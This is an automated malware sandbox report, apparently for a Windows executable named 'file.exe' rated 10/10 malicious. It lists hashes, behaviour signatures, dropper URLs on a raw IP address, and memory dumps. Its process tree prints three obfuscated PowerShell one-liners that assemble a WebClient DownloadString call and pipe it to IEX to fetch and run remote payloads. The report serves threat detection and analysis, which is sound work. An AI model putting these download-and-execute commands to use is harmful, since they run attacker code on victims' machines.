Analysis

  • max time kernel
    43s
  • max time network
    52s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/07/2024, 09:15

General

  • Target

    file.exe

  • Size

    36KB

  • MD5

    92d4e2ef88e5aafb72ddde13e84b549a

  • SHA1

    24ddd5e2c7e96e52e00f5a6e2b29e4b100d0c578

  • SHA256

    a77d96f186d1cc96dc589f4a6d55b45c9c04c77072fd504a720f437412ff93cb

  • SHA512

    af4822dafe72de541134b80d00b5fa2b1539a0c82b1261854fb15f24ec7cdf3e34791e19915dab32b132c6e6e58760f4c599d532fcb220f89e941cb065e28c6f

  • SSDEEP

    384:4b9oKDQckRKDVbJapdKDGPGAtyfc1FKDGPGAIpEKDVbJrkiKDQ:M90PGeD1ZPGv9

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://85.28.47.8/x/L.png

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://85.28.47.8/x/M.png

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://85.28.47.8/S.png

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2416
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://85.28.47.8/x/L.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2140
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://85.28.47.8/x/M.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1168
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://85.28.47.8/S.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4468

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

          Filesize

          1KB

          MD5

          4280e36a29fa31c01e4d8b2ba726a0d8

          SHA1

          c485c2c9ce0a99747b18d899b71dfa9a64dabe32

          SHA256

          e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359

          SHA512

          494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

          Filesize

          53KB

          MD5

          06ad34f9739c5159b4d92d702545bd49

          SHA1

          9152a0d4f153f3f40f7e606be75f81b582ee0c17

          SHA256

          474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

          SHA512

          c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          18KB

          MD5

          0056bf6d79a5e67f7b9be9ef103819d0

          SHA1

          f91e8a90faea7e2a04f4bd1e3eac1913d3a4894d

          SHA256

          0a91613a02d46a1e6b148f009430287ca0f491274e14d426337f9b8867b519c8

          SHA512

          cb4fbdf681a913bcf1d632485f413159394b7d1bbbd4bac1e0c49a5ec51486e2d869fd83a3c0c47bc142cf46b57e83aad9c2562e6c3d9206098b5ca0f359add2

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          18KB

          MD5

          58687bcd402ab6fc2c7faa29c89f7f4c

          SHA1

          169998a8a13004953e2bf497f73293e76d106df6

          SHA256

          a195ea4a0e9d578ccacdb855a0dc75244544259c759dd17180a22f19d7347419

          SHA512

          5575b04b2350e1b20c3f4de4fcc2ddcf235e2087dd5547f9b737f54baae9753daf81601478ed6d24d558cdcc28911df4a444a01e8ce22878485e2507bdfb7c5b

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gqzqu035.5kg.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/1168-11-0x00000000053B0000-0x00000000053D2000-memory.dmp

          Filesize

          136KB

        • memory/1168-6-0x0000000074A90000-0x0000000075240000-memory.dmp

          Filesize

          7.7MB

        • memory/1168-57-0x0000000074A90000-0x0000000075240000-memory.dmp

          Filesize

          7.7MB

        • memory/1168-2-0x0000000074A9E000-0x0000000074A9F000-memory.dmp

          Filesize

          4KB

        • memory/1168-10-0x0000000074A90000-0x0000000075240000-memory.dmp

          Filesize

          7.7MB

        • memory/1168-13-0x00000000054C0000-0x0000000005526000-memory.dmp

          Filesize

          408KB

        • memory/1168-55-0x0000000074A9E000-0x0000000074A9F000-memory.dmp

          Filesize

          4KB

        • memory/1168-12-0x0000000005450000-0x00000000054B6000-memory.dmp

          Filesize

          408KB

        • memory/1168-54-0x0000000074A90000-0x0000000075240000-memory.dmp

          Filesize

          7.7MB

        • memory/1168-63-0x0000000074A90000-0x0000000075240000-memory.dmp

          Filesize

          7.7MB

        • memory/1168-4-0x0000000002210000-0x0000000002246000-memory.dmp

          Filesize

          216KB

        • memory/2140-44-0x0000000006560000-0x000000000657E000-memory.dmp

          Filesize

          120KB

        • memory/2140-8-0x0000000074A90000-0x0000000075240000-memory.dmp

          Filesize

          7.7MB

        • memory/2140-67-0x0000000074A90000-0x0000000075240000-memory.dmp

          Filesize

          7.7MB

        • memory/2140-3-0x0000000074A90000-0x0000000075240000-memory.dmp

          Filesize

          7.7MB

        • memory/2140-45-0x0000000006B40000-0x0000000006B8C000-memory.dmp

          Filesize

          304KB

        • memory/2140-53-0x0000000074A90000-0x0000000075240000-memory.dmp

          Filesize

          7.7MB

        • memory/2140-15-0x0000000074A90000-0x0000000075240000-memory.dmp

          Filesize

          7.7MB

        • memory/4468-31-0x00000000061B0000-0x0000000006504000-memory.dmp

          Filesize

          3.3MB

        • memory/4468-56-0x0000000074A90000-0x0000000075240000-memory.dmp

          Filesize

          7.7MB

        • memory/4468-9-0x0000000074A90000-0x0000000075240000-memory.dmp

          Filesize

          7.7MB

        • memory/4468-14-0x0000000074A90000-0x0000000075240000-memory.dmp

          Filesize

          7.7MB

        • memory/4468-7-0x0000000074A90000-0x0000000075240000-memory.dmp

          Filesize

          7.7MB

        • memory/4468-64-0x0000000074A90000-0x0000000075240000-memory.dmp

          Filesize

          7.7MB

        • memory/4468-5-0x0000000005910000-0x0000000005F38000-memory.dmp

          Filesize

          6.2MB

        • memory/4468-47-0x0000000006C70000-0x0000000006C8A000-memory.dmp

          Filesize

          104KB

        • memory/4468-46-0x0000000008110000-0x000000000878A000-memory.dmp

          Filesize

          6.5MB